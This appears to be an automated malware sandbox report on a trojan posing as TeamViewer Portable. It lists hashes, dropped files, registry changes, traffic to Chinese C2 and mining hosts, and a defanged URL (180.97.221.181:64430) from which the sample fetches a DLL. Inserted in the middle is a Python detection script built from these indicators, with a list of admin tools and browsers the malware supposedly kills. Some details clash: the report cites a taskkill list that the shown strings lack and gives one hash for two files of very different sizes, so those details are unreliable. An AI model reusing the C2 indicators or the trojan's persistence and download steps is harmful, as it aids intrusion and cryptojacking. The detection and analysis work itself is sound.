Gen.Variant.Graftor.340943_3834fb5cce
Gen:Variant.Graftor.340943 (BitDefender), UDS:DangerousObject.Multi.Generic (Kaspersky), Gen:Variant.Graftor.340943 (B) (Emsisoft), Gen:Variant.Graftor.340943 (FSecure), Gen:Variant.Graftor.340943 (AdAware), Trojan.Win32.Swrort.3.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
MD5: 3834fb5cce08b127b14b5518cb57ecdc
SHA1: d704b2168f08b21a399ec01fc4b23daecc39cd98
SHA256: 3ec9f51db591906822ed608851a41d4f57693e75d6d9d4d5c077a3e6aa4eac50
SSDeep: 192:UNllR1cYY23ag8K8AvEpQkIVj7o893vbuYa0eia08MN1oynXboN0Qd63la3ZI:wlrDqg8R0qQvwivbwMN1xHQdO
Size: 24676 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: MicrosoftVisualC, MicrosoftVisualCv50v60MFC, MicrosoftVisualC50, Armadillov171, UPolyXv05_v6
Company: no certificate found
Created at: 2017-07-18 06:11:44
Analyzed on: Windows7 SP1 32-bit
Summary:
Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Payload
No specific payload was identified by the automated analysis. The activity recorded below is nonetheless consistent with a Monero-mining payload delivered by a remote-access component: Iphgbnc.exe downloads x[1].exe and writes it to C:\Picture.exe, Picture.exe then writes an xmrig binary to C:\Users\"%CurrentUserName%"\AppData\Roaming\xmrig\svchost.exe, the sandbox observed traffic to pool.minexmr.com, and the service component registered under HKLM\System\CurrentControlSet\services\Wsrags xnzeepsk contacts qingxiaofeng.f3322.org and fetches NetSyst96.dll from 180.97.221.181:64430.
Process activity
The Trojan creates the following process(es):
WerFault.exe:556
Iphgbnc.exe:3996
Picture.exe:4068
%original file name%.exe:3656
The Trojan injects its code into the following process(es):
Iphgbnc.exe:140
Iphgbnc.exe:4092
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process WerFault.exe:556 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Windows\Temp\WER4E01.tmp.WERInternalMetadata.xml (51540 bytes)
C:\Windows\Temp\WER4DB2.tmp.appcompat.txt (3176 bytes)
The Trojan deletes the following file(s):
C:\Windows\Temp\WER4DB2.tmp (0 bytes)
C:\Windows\Temp\WER5987.tmp (0 bytes)
C:\Windows\Temp\WER4E01.tmp (0 bytes)
C:\Windows\Temp\WER4DB2.tmp.appcompat.txt (0 bytes)
The process Iphgbnc.exe:3996 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\X66G0HIG\x[1].exe (434673 bytes)
C:\Picture.exe (442977 bytes)
The process Iphgbnc.exe:140 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\705A76DE71EA2CAEBB8F0907449CE086_C37EB0A02CA707BDA9677EF4ED9290A5 (1 bytes)
C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF (1480 bytes)
C:\Windows\Temp\TarAA15.tmp (2712 bytes)
C:\Windows\Temp\CabAA14.tmp (48 bytes)
C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\705A76DE71EA2CAEBB8F0907449CE086_C37EB0A02CA707BDA9677EF4ED9290A5 (1464 bytes)
C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF (1 bytes)
The Trojan deletes the following file(s):
C:\Windows\Temp\TarAA15.tmp (0 bytes)
C:\%original file name%.exe (0 bytes)
C:\Windows\Temp\CabAA14.tmp (0 bytes)
The process Picture.exe:4068 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Roaming\xmrig\svchost.exe (6841 bytes)
The process %original file name%.exe:3656 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files%\Mysqld\NetSyst96.PNG (118569 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LQUMIDKJ\NetSyst96[1].dll (115321 bytes)
%Program Files%\Microsoft Iphgbn\Iphgbnc.exe (52 bytes)
Registry activity
The process WerFault.exe:556 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Rpc]
"UuidSequenceNumber" = "134429773"
[\REGISTRY\A\{2011A0BC-9527-11E6-BC4D-000C29AF71A7}\DefaultObjectStore\ObjectTable\145]
"_ObjectId_" = "Type: REG_QWORD, Length: 8"
"_Usn_" = "Type: REG_QWORD, Length: 8"
[\REGISTRY\A\{2011A0BC-9527-11E6-BC4D-000C29AF71A7}\DefaultObjectStore\IndexTable\FileIdIndex-{f80abb43-5224-11e3-bc81-806e6f6e6963}\10000000055E1]
"145" = "Type: REG_QWORD, Length: 8"
[\REGISTRY\A\{2011A0BC-9527-11E6-BC4D-000C29AF71A7}\DefaultObjectStore\ObjectTable\145]
"_UsnJournalId_" = "Type: REG_QWORD, Length: 8"
"_ObjectLru_" = "Type: REG_QWORD, Length: 8"
[\REGISTRY\A\{2011A0BC-9527-11E6-BC4D-000C29AF71A7}\DefaultObjectStore\LruList\0000000000000579]
"ObjectId" = "Type: REG_QWORD, Length: 8"
[\REGISTRY\A\{2011A0BC-9527-11E6-BC4D-000C29AF71A7}\DefaultObjectStore]
"_CurrentObjectId_" = "Type: REG_QWORD, Length: 8"
[\REGISTRY\A\{2011A0BC-9527-11E6-BC4D-000C29AF71A7}\DefaultObjectStore\LruList\0000000000000579]
"ObjectLru" = "Type: REG_QWORD, Length: 8"
[HKLM\SOFTWARE\Microsoft\Windows\Windows Error Reporting\Debug]
"ExceptionRecord" = "05 00 00 C0 00 00 00 00 00 00 00 00 00 00 00 00"
[\REGISTRY\A\{2011A0BC-9527-11E6-BC4D-000C29AF71A7}\DefaultObjectStore\LruList]
"CurrentLru" = "Type: REG_QWORD, Length: 8"
[\REGISTRY\A\{2011A0BC-9527-11E6-BC4D-000C29AF71A7}\DefaultObjectStore\ObjectTable\145\Indexes\FileIdIndex-{f80abb43-5224-11e3-bc81-806e6f6e6963}]
"10000000055E1" = "Type: REG_QWORD, Length: 8"
[\REGISTRY\A\{2011A0BC-9527-11E6-BC4D-000C29AF71A7}\DefaultObjectStore\ObjectTable\145]
"_FileId_" = "Type: REG_QWORD, Length: 8"
The process Iphgbnc.exe:3996 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Tracing\Iphgbnc_RASAPI32]
"EnableConsoleTracing" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-fb-cd-cc]
"WpadDecision" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\Iphgbnc_RASAPI32]
"MaxFileSize" = "1048576"
"ConsoleTracingMask" = "4294901760"
[HKLM\System\CurrentControlSet\services\Wsrags xnzeepsk]
"ConnectGroup" = "ĬÈ÷Ö×é"
[HKLM\SOFTWARE\Microsoft\Tracing\Iphgbnc_RASMANCS]
"EnableFileTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\Iphgbnc_RASAPI32]
"FileDirectory" = "%windir%\tracing"
[HKLM\SOFTWARE\Microsoft\Tracing\Iphgbnc_RASMANCS]
"EnableConsoleTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\Iphgbnc_RASAPI32]
"EnableFileTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\Iphgbnc_RASMANCS]
"MaxFileSize" = "1048576"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-fb-cd-cc]
"WpadDecisionReason" = "1"
"WpadDecisionTime" = "00 43 99 6C 19 0A D3 01"
[HKLM\SOFTWARE\Microsoft\Tracing\Iphgbnc_RASMANCS]
"FileDirectory" = "%windir%\tracing"
"FileTracingMask" = "4294901760"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 39 00 00 00 09 00 00 00 00 00 00 00"
[HKLM\System\CurrentControlSet\services\Wsrags xnzeepsk]
"Description" = "Copyright(C) 2012. All Rights Reserved."
[HKLM\SOFTWARE\Microsoft\Tracing\Iphgbnc_RASAPI32]
"FileTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\Iphgbnc_RASMANCS]
"ConsoleTracingMask" = "4294901760"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"
The process Iphgbnc.exe:140 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKU\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2C\52C64B7E]
"LanguageList" = "en-US, en"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 03 00 00 00 09 00 00 00 00 00 00 00"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"DefaultConnectionSettings" = "46 00 00 00 03 00 00 00 09 00 00 00 00 00 00 00"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKLM\System\CurrentControlSet\services\Wsrags xnzeepsk]
"MarkTime" = "2017-07-31 19:24"
Proxy settings are disabled:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in system registry:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
"ProxyBypass"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
[HKLM\System\CurrentControlSet\services\Wsrags xnzeepsk]
"DeleteFiles"
The process Picture.exe:4068 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\System\CurrentControlSet\services\WinHelps]
"Description" = "Windows H"
The process %original file name%.exe:3656 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKLM\SOFTWARE\Microsoft\Tracing\3834fb5cce08b127b14b5518cb57ecdc_RASMANCS]
"FileTracingMask" = "4294901760"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{4AE6FCD0-212D-417D-82A8-CFA05ACC2876}]
"WpadDecisionTime" = "60 E6 13 6C 19 0A D3 01"
"WpadDecisionReason" = "1"
[HKLM\SOFTWARE\Microsoft\Tracing\3834fb5cce08b127b14b5518cb57ecdc_RASAPI32]
"FileTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\3834fb5cce08b127b14b5518cb57ecdc_RASMANCS]
"EnableConsoleTracing" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\3834fb5cce08b127b14b5518cb57ecdc_RASMANCS]
"MaxFileSize" = "1048576"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad]
"WpadLastNetwork" = "{4AE6FCD0-212D-417D-82A8-CFA05ACC2876}"
[HKLM\SOFTWARE\Microsoft\Tracing\3834fb5cce08b127b14b5518cb57ecdc_RASMANCS]
"ConsoleTracingMask" = "4294901760"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-fb-cd-cc]
"WpadDecision" = "3"
[HKLM\SOFTWARE\Microsoft\Tracing\3834fb5cce08b127b14b5518cb57ecdc_RASMANCS]
"EnableFileTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\3834fb5cce08b127b14b5518cb57ecdc_RASAPI32]
"ConsoleTracingMask" = "4294901760"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{4AE6FCD0-212D-417D-82A8-CFA05ACC2876}]
"WpadDecision" = "3"
[HKLM\System\CurrentControlSet\services\Wsrags xnzeepsk]
"DeleteFiles" = "c:\%original file name%.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"DefaultConnectionSettings" = "46 00 00 00 0A 00 00 00 09 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Tracing\3834fb5cce08b127b14b5518cb57ecdc_RASAPI32]
"FileDirectory" = "%windir%\tracing"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{4AE6FCD0-212D-417D-82A8-CFA05ACC2876}]
"WpadNetworkName" = "Network 2"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-fb-cd-cc]
"WpadDecisionTime" = "60 E6 13 6C 19 0A D3 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 38 00 00 00 09 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Tracing\3834fb5cce08b127b14b5518cb57ecdc_RASAPI32]
"MaxFileSize" = "1048576"
[HKLM\SOFTWARE\Microsoft\Tracing\3834fb5cce08b127b14b5518cb57ecdc_RASMANCS]
"FileDirectory" = "%windir%\tracing"
[HKLM\SOFTWARE\Microsoft\Tracing\3834fb5cce08b127b14b5518cb57ecdc_RASAPI32]
"EnableFileTracing" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-fb-cd-cc]
"WpadDecisionReason" = "1"
[HKLM\SOFTWARE\Microsoft\Tracing\3834fb5cce08b127b14b5518cb57ecdc_RASAPI32]
"EnableConsoleTracing" = "0"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"
Dropped PE files
MD5 | File path |
---|---|
5c83328ad8f922e650ce183c1709c75a | c:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\X66G0HIG\x[1].exe |
5c83328ad8f922e650ce183c1709c75a | c:\Users\"%CurrentUserName%"\AppData\Roaming\xmrig\svchost.exe |
4df96d091f8b938be25a8af94dddbdcf | c:\Windows\Temp\svchsot.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
VersionInfo
Company Name: PortableAppZ.blogspot.com
Product Name: TeamViewer Portable
Product Version: 0.0.0.0
Legal Copyright: Bernat
Legal Trademarks: PortableAppZ is a Trademark of Bernat
Original Filename: TeamViewerPortable.exe
Internal Name: TeamViewer Portable
File Version: 0.0.0.0
File Description: TeamViewer Portable
Comments: Allows TeamViewer to be run from a removable drive. For additional details, visit http://portableappz.blogspot.com
Language: Chinese (Simplified, PRC)
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 7090 | 8192 | 4.08984 | 8e3d0e62c2ba7b42050f1ed41b71d68b |
.rdata | 12288 | 3412 | 4096 | 2.98192 | a9fec56b4db3033e67080071a5532343 |
.data | 16384 | 3112 | 4096 | 1.42152 | 4587d70cb5ed44479eb785df9606d1e2 |
.rsrc | 20480 | 2792 | 4096 | 2.55498 | 2b9fd2c6cecc7b70253f5428e72ed4f6 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
URLs
URL |
---|
hxxp://nds.qzone.qq.com/fcg-bin/cgi_get_portrait.fcg?uins=12345678 |
hxxp://e8218.dscb1.akamaiedge.net/MFEwTzBNMEswSTAJBgUrDgMCGgUABBS56bKHAoUD+Oyl+0LhPg9JxyQm4gQUf9Nlp8Ld7LvwMAnzQzn6Aq8zMTMCEFE/uXQ4cLc0QEGNMJMGmf8= |
hxxp://e8218.dscb1.akamaiedge.net/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTRsWSLjJ8N0Wujis0rUBfV+c/AZAQUX2DPYZBV34RDFIpgKrL1evRDGO8CEFkLoIvOqXUlJdYHL2zDUkA= |
hxxp://nds.qzone.qq.com/?s_url=http://users.qzone.qq.com/fcg-bin/cgi_get_portrait.fcg?uins=12345678 |
hxxp://i.qq.com/?s_url=http://users.qzone.qq.com/fcg-bin/cgi_get_portrait.fcg?uins=12345678 |
hxxp://s2.symcb.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBS56bKHAoUD+Oyl+0LhPg9JxyQm4gQUf9Nlp8Ld7LvwMAnzQzn6Aq8zMTMCEFE/uXQ4cLc0QEGNMJMGmf8= |
hxxp://users.qzone.qq.com/fcg-bin/cgi_get_portrait.fcg?uins=12345678 |
hxxp://ss.symcd.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTRsWSLjJ8N0Wujis0rUBfV+c/AZAQUX2DPYZBV34RDFIpgKrL1evRDGO8CEFkLoIvOqXUlJdYHL2zDUkA= |
pool.minexmr.com |
qingxiaofeng.f3322.org |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
ET POLICY HTTP Request on Unusual Port Possibly Hostile
ET TROJAN Single char EXE direct download likely trojan (multiple families)
ET CURRENT_EVENTS Terse alphanumeric executable downloader high likelihood of being hostile
ET POLICY PE EXE or DLL Windows file download HTTP
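A practitioner who wants to hunt for this sample on other hosts can turn the indicators listed above into a small detection routine. The following is an added Python example, not part of the Lavasoft report, that runs over a handful of constructed Sysmon-style events: the dropped-file hashes, the svchost.exe written outside System32, the two service names, the taskkill list from the strings, the dynamic-DNS C2 name and the download from 180.97.221.181 on a non-standard port. Two things in the report are deliberately not matched: the OCSP requests to ss.symcd.com and s2.symcb.com with User-Agent Microsoft-CryptoAPI/6.1 (and the CryptnetUrlCache files) are Windows' own certificate revocation checking, most likely triggered when WinINet followed the 301 redirect to hXXps://users.qzone.qq.com, and the HKLM\SOFTWARE\Microsoft\Tracing\<name>_RASAPI32 / _RASMANCS keys are created for any process that loads rasapi32.dll. The event format, the "usual" HTTP port set and the dynamic-DNS suffix list are assumptions.

```python
import re
from dataclasses import dataclass

# Indicators copied from the report above.
DROPPED_MD5 = {
    "5c83328ad8f922e650ce183c1709c75a",  # x[1].exe and its copy ...\AppData\Roaming\xmrig\svchost.exe
    "4df96d091f8b938be25a8af94dddbdcf",  # c:\Windows\Temp\svchsot.exe
    "3834fb5cce08b127b14b5518cb57ecdc",  # the analysed sample itself
}
C2_HOSTS = {"qingxiaofeng.f3322.org", "pool.minexmr.com"}
C2_IPS = {"180.97.221.181"}
MALICIOUS_SERVICES = {"wsrags xnzeepsk", "winhelps"}
# Binary names that are only legitimate under the Windows system directories.
SYSTEM_BINARY_NAMES = {"svchost.exe"}
SYSTEM_DIRS = re.compile(r"^[a-z]:\\windows\\(system32|syswow64)\\", re.I)
# Process names the RAT's strings show it terminates (admin tools and browsers).
KILL_TARGETS = {"cmd.exe", "taskmgr.exe", "regedit.exe", "mmc.exe", "mstsc.exe",
                "firefox.exe", "chrome.exe", "iexplore.exe", "360se.exe"}
TASKKILL = re.compile(r"\btaskkill(?:\.exe)?\b.*?/im\s+(\S+)", re.I)
SERVICE_KEY = re.compile(r"\\services\\([^\\]+)", re.I)
DYNAMIC_DNS_SUFFIXES = (".f3322.org",)   # assumption: the provider behind the C2 name; extend as needed
USUAL_HTTP_PORTS = {80, 8080}            # assumption: tune to the environment


@dataclass(frozen=True)
class Finding:
    event_id: int
    rule: str
    detail: str


def analyze(events):
    """Return one Finding per (event, rule) hit.

    Events are plain dicts with a 'type' key modelled loosely on Sysmon
    categories (file_create, process_create, registry_set, dns_query,
    network_connect); a real run would feed them from an EVTX/JSON export."""
    out = []

    def hit(e, rule, detail):
        out.append(Finding(e["id"], rule, detail))

    for e in events:
        t = e["type"]
        if t == "file_create":
            path = e["path"]
            name = path.rsplit("\\", 1)[-1].lower()
            if name in SYSTEM_BINARY_NAMES and not SYSTEM_DIRS.match(path):
                hit(e, "system-binary-name-outside-system32", path)
            if e.get("md5", "").lower() in DROPPED_MD5:
                hit(e, "known-dropped-hash", e["md5"])
        elif t == "process_create":
            m = TASKKILL.search(e["cmdline"])
            if m and m.group(1).lower() in KILL_TARGETS:
                hit(e, "admin-tool-or-browser-kill", m.group(1))
        elif t == "registry_set":
            m = SERVICE_KEY.search(e["key"])
            if m and m.group(1).lower() in MALICIOUS_SERVICES:
                hit(e, "known-malicious-service", m.group(1))
            # The Tracing\<exe>_RASAPI32 keys are written by rasapi32.dll for any
            # process that loads it: they only show RAS/WinINet use, so no rule.
        elif t == "dns_query":
            host = e["host"].lower()
            if host in C2_HOSTS:
                hit(e, "known-c2-host", host)
            elif host.endswith(DYNAMIC_DNS_SUFFIXES):
                hit(e, "dynamic-dns-host", host)
        elif t == "network_connect":
            if e["ip"] in C2_IPS:
                hit(e, "known-c2-ip", e["ip"])
            if e.get("proto") == "http" and e["port"] not in USUAL_HTTP_PORTS:
                hit(e, "http-on-unusual-port", f'{e["ip"]}:{e["port"]}')
    return out


def rules_by_event(events):
    """Map event id -> set of rule names that fired (handy for triage)."""
    summary = {}
    for f in analyze(events):
        summary.setdefault(f.event_id, set()).add(f.rule)
    return summary


# Constructed sample events: the first group mirrors the report's activity,
# the second group is benign noise from the same report that must not fire.
SAMPLE_EVENTS = [
    {"id": 1, "type": "file_create", "md5": "5c83328ad8f922e650ce183c1709c75a",
     "path": r"C:\Users\alice\AppData\Roaming\xmrig\svchost.exe"},
    {"id": 2, "type": "file_create", "md5": "4df96d091f8b938be25a8af94dddbdcf",
     "path": r"C:\Windows\Temp\svchsot.exe"},
    {"id": 3, "type": "process_create", "cmdline": "taskkill /f /im taskmgr.exe"},
    {"id": 4, "type": "registry_set",
     "key": r"HKLM\System\CurrentControlSet\services\Wsrags xnzeepsk\Description"},
    {"id": 5, "type": "dns_query", "host": "qingxiaofeng.f3322.org"},
    {"id": 6, "type": "dns_query", "host": "other-host.f3322.org"},  # constructed name
    {"id": 7, "type": "network_connect", "ip": "180.97.221.181", "port": 64430, "proto": "http"},
    # Benign: WER temp file, RAS tracing key, CryptoAPI OCSP lookup, plain HTTP.
    {"id": 8, "type": "file_create", "md5": "",
     "path": r"C:\Windows\Temp\WER4E01.tmp.WERInternalMetadata.xml"},
    {"id": 9, "type": "registry_set",
     "key": r"HKLM\SOFTWARE\Microsoft\Tracing\Iphgbnc_RASAPI32\EnableFileTracing"},
    {"id": 10, "type": "dns_query", "host": "ss.symcd.com"},
    {"id": 11, "type": "network_connect", "ip": "203.0.113.10", "port": 80, "proto": "http"},  # constructed
]

if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f"event {f.event_id:>2}  {f.rule:<38} {f.detail}")
```

Hash and hostname matches are the brittle part of this: the miner binary and the C2 name will change between campaigns, while the svchost.exe-outside-System32, the taskkill burst against admin tools and browsers, and plain HTTP on a high port survive rebuilds of the sample.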
Traffic
GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBTRsWSLjJ8N0Wujis0rUBfV+c/AZAQUX2DPYZBV34RDFIpgKrL1evRDGO8CEFkLoIvOqXUlJdYHL2zDUkA= HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ss.symcd.com
HTTP/1.1 200 OK
Server: nginx/1.10.2
Content-Type: application/ocsp-response
Content-Length: 1609
content-transfer-encoding: binary
Cache-Control: max-age=332630, public, no-transform, must-revalidate
Last-Modified: Fri, 28 Jul 2017 12:47:59 GMT
Expires: Fri, 4 Aug 2017 12:47:59 GMT
Date: Mon, 31 Jul 2017 16:24:44 GMT
Connection: keep-alive
<<< binary application/ocsp-response body skipped (DER-encoded OCSP response: thisUpdate 2017-07-28 12:47:59Z, nextUpdate 2017-08-04 12:47:59Z, signed by the "Symantec Class 3 Secure Server CA - G4 OCSP Responder" certificate valid 2017-07-16 to 2017-10-14, CPS/RPA at hXXp://VVV.symauth.com/cps and hXXp://VVV.symauth.com/rpa) >>>
GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBS56bKHAoUD+Oyl+0LhPg9JxyQm4gQUf9Nlp8Ld7LvwMAnzQzn6Aq8zMTMCEFE/uXQ4cLc0QEGNMJMGmf8= HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: s2.symcb.com
HTTP/1.1 200 OK
Server: nginx/1.10.2
Content-Type: application/ocsp-response
Content-Length: 1763
content-transfer-encoding: binary
Cache-Control: max-age=328689, public, no-transform, must-revalidate
Last-Modified: Fri, 28 Jul 2017 11:38:15 GMT
Expires: Fri, 4 Aug 2017 11:38:15 GMT
Date: Mon, 31 Jul 2017 16:24:38 GMT
Connection: keep-alive
<<< binary application/ocsp-response body skipped (DER-encoded OCSP response: thisUpdate 2017-07-28 11:38:15Z, nextUpdate 2017-08-04 11:38:15Z, signed by the "Symantec Class 3 PCA - G5 OCSP Responder Certificate 5" issued by "VeriSign Class 3 Public Primary Certification Authority - G5", valid 2016-11-22 to 2017-12-14) >>>
GET /fcg-bin/cgi_get_portrait.fcg?uins=12345678 HTTP/1.1
Host: users.qzone.qq.com
HTTP/1.1 301 Moved Permanently
Server: stgw/1.2.9.3_1.11.1
Date: Mon, 31 Jul 2017 16:24:30 GMT
Content-Type: text/html
Content-Length: 192
Connection: keep-alive
Location: hXXps://users.qzone.qq.com/fcg-bin/cgi_get_portrait.fcg?uins=12345678
<html><head><title>301 Moved Permanently</title></head><body bgcolor="white"><center><h1>301 Moved Permanently</h1></center><hr><center>stgw/1.2.9.3_1.11.1</center></body></html>
GET /?s_url=http://users.qzone.qq.com/fcg-bin/cgi_get_portrait.fcg?uins=12345678 HTTP/1.1
Connection: Keep-Alive
Host: i.qq.com
Cookie: uin=; skey=
HTTP/1.1 200 OK
Date: Mon, 31 Jul 2017 16:24:47 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: TSW/Node.js
Cache-Control: no-cache
Vary: Origin, Accept
Mod-Map: platform_loginQzone:hybrid/app/platform/loginQzone/sync/sync.js
<!doctype html>
<html>
<head>
<meta charset="UTF-8" />
<meta http-equiv="content-type" content="text/html; charset=UTF-8" />
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<title>QQ...</title>
<meta name="keywords" content="QQ...,qzone,...,qq...,..." />
<meta name="description" content="QQ...(Qzone)...QQ..." />
<link rel="apple-touch-icon" href="hXXps://qzonestyle.gtimg.cn/qzone/v8/index/touch-icon-ipad-retina.png">
<link rel="apple-touch-icon" sizes="76x76" href="hXXps://qzonestyle.gtimg.cn/qzone/v8/index/touch-icon-ipad.png">
<link rel="apple-touch-icon" sizes="120x120" href="hXXps://qzonestyle.gtimg.cn/qzone/v8/index/touch-icon-iphone-retina.png">
<link rel="apple-touch-icon" sizes="152x152" href="hXXps://qzonestyle.gtimg.cn/qzone/v8/index/touch-icon-ipad-retina.png">
<<< skipped >>>
The Trojan connects to the servers at the following location(s):
.text
`.rdata
@.data
.rsrc
SSSSh
MFC42.DLL
MSVCRT.dll
_acmdln
GetProcessHeap
KERNEL32.dll
USER32.dll
Misql.exe
hXXp://180.97.221.181:64430/NetSyst96.dll
